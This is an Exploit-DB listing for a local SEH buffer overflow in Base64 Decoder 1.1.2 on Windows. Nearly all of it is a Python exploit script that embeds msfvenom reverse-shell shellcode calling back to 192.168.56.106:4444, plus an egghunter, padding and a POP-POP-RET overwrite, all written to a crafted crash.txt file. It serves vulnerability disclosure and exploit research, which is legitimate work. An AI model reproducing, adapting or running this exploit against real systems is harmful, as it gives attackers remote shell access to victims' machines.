Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH Egghunter)

EDB-ID:

46625

CVE:

N/A




Platform:

Windows

Date:

2019-03-28


#!/usr/bin/env python

# Exploit Title: Base64 Decoder 1.1.2 Local Buffer Overflow (SEH) + Egghunter
# Date: 28.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://4mhz.de/b64dec.html
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Version: Base64 Decoder 1.1.2
# Tested on: Windows 7 Professional SP1 x86
# Notes: this exploit implements the PoC described here: https://www.exploit-db.com/exploits/39070

junk="A" * 4
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -f py -b '\x00\x0a'
buf =  "w00tw00t"
buf += "\xbd\x82\x38\x76\xea\xd9\xcd\xd9\x74\x24\xf4\x58\x2b"
buf += "\xc9\xb1\x52\x83\xe8\xfc\x31\x68\x0e\x03\xea\x36\x94"
buf += "\x1f\x16\xae\xda\xe0\xe6\x2f\xbb\x69\x03\x1e\xfb\x0e"
buf += "\x40\x31\xcb\x45\x04\xbe\xa0\x08\xbc\x35\xc4\x84\xb3"
buf += "\xfe\x63\xf3\xfa\xff\xd8\xc7\x9d\x83\x22\x14\x7d\xbd"
buf += "\xec\x69\x7c\xfa\x11\x83\x2c\x53\x5d\x36\xc0\xd0\x2b"
buf += "\x8b\x6b\xaa\xba\x8b\x88\x7b\xbc\xba\x1f\xf7\xe7\x1c"
buf += "\x9e\xd4\x93\x14\xb8\x39\x99\xef\x33\x89\x55\xee\x95"
buf += "\xc3\x96\x5d\xd8\xeb\x64\x9f\x1d\xcb\x96\xea\x57\x2f"
buf += "\x2a\xed\xac\x4d\xf0\x78\x36\xf5\x73\xda\x92\x07\x57"
buf += "\xbd\x51\x0b\x1c\xc9\x3d\x08\xa3\x1e\x36\x34\x28\xa1"
buf += "\x98\xbc\x6a\x86\x3c\xe4\x29\xa7\x65\x40\x9f\xd8\x75"
buf += "\x2b\x40\x7d\xfe\xc6\x95\x0c\x5d\x8f\x5a\x3d\x5d\x4f"
buf += "\xf5\x36\x2e\x7d\x5a\xed\xb8\xcd\x13\x2b\x3f\x31\x0e"
buf += "\x8b\xaf\xcc\xb1\xec\xe6\x0a\xe5\xbc\x90\xbb\x86\x56"
buf += "\x60\x43\x53\xf8\x30\xeb\x0c\xb9\xe0\x4b\xfd\x51\xea"
buf += "\x43\x22\x41\x15\x8e\x4b\xe8\xec\x59\xb4\x45\xd6\xf3"
buf += "\x5c\x94\x26\x15\xc1\x11\xc0\x7f\xe9\x77\x5b\xe8\x90"
buf += "\xdd\x17\x89\x5d\xc8\x52\x89\xd6\xff\xa3\x44\x1f\x75"
buf += "\xb7\x31\xef\xc0\xe5\x94\xf0\xfe\x81\x7b\x62\x65\x51"
buf += "\xf5\x9f\x32\x06\x52\x51\x4b\xc2\x4e\xc8\xe5\xf0\x92"
buf += "\x8c\xce\xb0\x48\x6d\xd0\x39\x1c\xc9\xf6\x29\xd8\xd2"
buf += "\xb2\x1d\xb4\x84\x6c\xcb\x72\x7f\xdf\xa5\x2c\x2c\x89"
buf += "\x21\xa8\x1e\x0a\x37\xb5\x4a\xfc\xd7\x04\x23\xb9\xe8"
buf += "\xa9\xa3\x4d\x91\xd7\x53\xb1\x48\x5c\x63\xf8\xd0\xf5"
buf += "\xec\xa5\x81\x47\x71\x56\x7c\x8b\x8c\xd5\x74\x74\x6b"
buf += "\xc5\xfd\x71\x37\x41\xee\x0b\x28\x24\x10\xbf\x49\x6d"

junk += buf
print "filling with " + str(490-len(junk))
junk += "A" * (490 -len(junk))


junk+="\x90\x90\x90\x90"
junk+="\x90\x90\x90\x90"

# msf-egghunter -f raw -e w00t -a x86 -p windows | msfvenom -a x86 --platform windows -f py -b '\x00' -v egg
egg =  ""
egg += "\xb8\x2e\x04\x6d\x70\xdb\xd5\xd9\x74\x24\xf4\x5a\x2b"
egg += "\xc9\xb1\x09\x31\x42\x12\x83\xea\xfc\x03\x6c\x0a\x8f"
egg += "\x85\x16\x93\x85\x99\xd9\xd1\x4b\x0c\xe7\x8d\xa6\xfe"
egg += "\xdb\x28\x63\x8b\xcc\x8b\xe4\x43\x22\x98\x83\x73\xed"
egg += "\x15\x7e\xd4\x84\x32\x81\xcc"
junk += egg

junk += "A"*(620-len(junk))
junk+="\xeb\x80\x90\x90"
# POP-POP-RET is on 0x00401414
junk+="\x14\x14\x40"
f=open("crash.txt", "w")
f.write(junk)
f.close